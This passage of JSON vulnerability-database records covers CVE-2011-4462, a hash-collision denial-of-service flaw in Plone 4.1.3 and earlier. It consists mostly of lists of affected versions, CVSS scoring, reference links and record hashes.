"plone:plone", "name": "plone", "operator": "eq", "version": "2.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:4.1.3", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "versionEndIncluding": "4.1.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4462"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T05:51:08", "references": [{"idList": ["GHSA-PCWM-8JC3-QXVJ"], "type": "github"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["SSV:26121"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2021-02-02T05:51:08", "rev": 2, "value": 5.5, "vector": "NONE"}}, "extraReferences": [{"name": "47406", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/47406"}, {"name": "VU#903934", "refsource": "CERT-VN", "tags": ["US Government Resource"], "url": "http://www.kb.cert.org/vuls/id/903934"}, {"name": "20111228 n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table", "refsource": "BUGTRAQ", "tags": [], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html"}, {"name": "http://www.ocert.org/advisories/ocert-2011-003.html", "refsource": "MISC", "tags": [], "url": "http://www.ocert.org/advisories/ocert-2011-003.html"}, {"name": "plone-hash-dos(72018)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"}, {"name": "http://www.nruns.com/_downloads/advisory28122011.pdf", "refsource": "MISC", "tags": [], "url": "http://www.nruns.com/_downloads/advisory28122011.pdf"}], "hash": "aec7c3320bb946d453e7228d1ebdf49d8ed6daed9d8d54bbcf84885c7d0673d7", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "52e44547de77c158411a779051afe6d2", "key": "extraReferences"}, {"hash": "19e5f52d89b2f1049b95fe11b3e2f92d", "key": "cpeConfiguration"}, {"hash": "bcb9298e9dedfc5a20fdb3b772b56354", "key": "cvelist"}, {"hash": "13f9056adf02b8cd9f68359a4c55c94c", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "8ee79e05af07bf9f5b1f16b80ef48a0f", "key": "description"}, {"hash": "272f4cdb9efa2b45de25b45c68585342", "key": "title"}, {"hash": "25d8c9d6f2d4709ad0ad6212d8369d9c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "b83b72f8535b4a135351c45b03cd9b84", "key": "affectedSoftware"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "85fc9715d07b57d9e72056856b007c7b", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "736a1ed0b7d76613eddb0b0826033359", "key": "references"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ef8dc55e27badb345f85c3696c61eb1d", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "id": "CVE-2011-4462", "immutableFields": [], "lastseen": "2021-02-02T05:51:08", "modified": "2017-08-29T01:30:00", "objectVersion": "1.5", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "reporter": "cve@mitre.org", "title": "CVE-2011-4462", "type": "cve", "viewCount": 9}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T05:51:08"}, {"bulletin": {"affectedSoftware": [{"name": "plone plone", "operator": "eq", "version": "3.1"}, {"name": "plone plone", "operator": "eq", "version": "3.3.5"}, {"name": "plone plone", "operator": "eq", "version": "2.1.3"}, {"name": "plone plone", "operator": "eq", "version": "3.0.4"}, {"name": "plone plone", "operator": "eq", "version": "3.0.5"}, {"name": "plone plone", "operator": "eq", "version": "2.1.2"}, {"name": "plone plone", "operator": "eq", "version": "3.0"}, {"name": "plone plone", "operator": "eq", "version": "1.0.2"}, {"name": "plone plone", "operator": "eq", "version": "2.5.4"}, {"name": "plone plone", "operator": "eq", "version": "3.0.1"}, {"name": "plone plone", "operator": "eq", "version": "2.5.2"}, {"name": "plone plone", "operator": "eq", "version": "1.0"}, {"name": "plone plone", "operator": "eq", "version": "3.1.3"}, {"name": "plone plone", "operator": "eq", "version": "4.0.9"}, {"name": "plone plone", "operator": "eq", "version": "2.0"}, {"name": "plone plone", "operator": "eq", "version": "3.1.2"}, {"name": "plone plone", "operator": "eq", "version": "1.0.6"}, {"name": "plone plone", "operator": "eq", "version": "3.0.3"}, {"name": "plone plone", "operator": "eq", "version": "4.0.3"}, {"name": "plone plone", "operator": "eq", "version": "3.1.4"}, {"name": "plone plone", "operator": "eq", "version": "2.5.1"}, {"name": "plone plone", "operator": "eq", "version": "3.0.2"}, {"name": "plone plone", "operator": "eq", "version": "2.5"}, {"name": "plone plone", "operator": "eq", "version": "3.3.3"}, {"name": "plone plone", "operator": "eq", "version": "2.5.5"}, {"name": "plone plone", "operator": "eq", "version": "4.0.5"}, {"name": "plone plone", "operator": "eq", "version": "3.3"}, {"name": "plone plone", "operator": "eq", "version": "2.1"}, {"name": "plone plone", "operator": "eq", "version": "4.0.7"}, {"name": "plone plone", "operator": "eq", "version": "3.2"}, {"name": "plone plone", "operator": "eq", "version": "4.1.1"}, {"name": "plone plone", "operator": "eq", "version": "2.1.1"}, {"name": "plone plone", "operator": "eq", "version": "2.5.3"}, {"name": "plone plone", "operator": "eq", "version": "4.0.1"}, {"name": "plone plone", "operator": "eq", "version": "1.0.4"}, {"name": "plone plone", "operator": "eq", "version": "2.0.1"}, {"name": "plone plone", "operator": "eq", "version": "1.0.3"}, {"name": "plone plone", "operator": "eq", "version": "4.0.2"}, {"name": "plone plone", "operator": "eq", "version": "3.1.1"}, {"name": "plone plone", "operator": "eq", "version": "1.0.1"}, {"name": "plone plone", "operator": "le", "version": "4.1.3"}, {"name": "plone plone", "operator": "eq", "version": "4.1.2"}, {"name": "plone plone", "operator": "eq", "version": "3.3.6"}, {"name": "plone plone", "operator": "eq", "version": "3.2.3"}, {"name": "plone plone", "operator": "eq", "version": "2.0.4"}, {"name": "plone plone", "operator": "eq", "version": "2.0.3"}, {"name": "plone plone", "operator": "eq", "version": "3.2.1"}, {"name": "plone plone", "operator": "eq", "version": "3.3.2"}, {"name": "plone plone", "operator": "eq", "version": "3.3.1"}, {"name": "plone plone", "operator": "eq", "version": "4.0.4"}, {"name": "plone plone", "operator": "eq", "version": "2.0.2"}, {"name": "plone plone", "operator": "eq", "version": "4.0"}, {"name": "plone plone", "operator": "eq", "version": "3.2.2"}, {"name": "plone plone", "operator": "eq", "version": "3.1.7"}, {"name": "plone plone", "operator": "eq", "version": "2.0.5"}, {"name": "plone plone", "operator": "eq", "version": "3.1.5.1"}, {"name": "plone plone", "operator": "eq", "version": "3.3.4"}, {"name": "plone plone", "operator": "eq", "version": "4.1"}, {"name": "plone plone", "operator": "eq", "version": "3.1.6"}, {"name": "plone plone", "operator": "eq", "version": "1.0.5"}, {"name": "plone plone", "operator": "eq", "version": "2.1.4"}, {"name": "plone plone", "operator": "eq", "version": "3.0.6"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", 